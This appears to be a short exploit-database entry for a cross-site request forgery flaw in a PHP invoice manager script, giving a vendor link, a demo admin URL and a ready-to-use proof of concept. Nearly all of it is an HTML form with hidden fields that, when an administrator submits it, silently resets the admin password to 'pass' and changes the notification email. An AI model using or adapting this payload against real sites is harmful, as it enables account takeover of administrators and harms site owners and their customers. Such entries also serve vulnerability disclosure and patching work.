# Exploit Title: Invoice Manager CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/invoice-manager-by-stivasoft/31738/
# Category:: webapps
# Demo : http://www.phpjabbers.com/demo/im_15/admin.php
# Greetz: Inj3ct0r Exploit DataBase 1337day.com
<form action="target.com/admin.php?ac=general" method="post">
<input name="admin_password" id="admin_password" size="25" maxlength="250" value="pass" type="hidden">
<input name="notify_email" id="notify_email" size="25" maxlength="250" value="notify@example.com" type="hidden">
<input name="save" value="Save" class="fancyButtons btnSave" type="submit">
</form>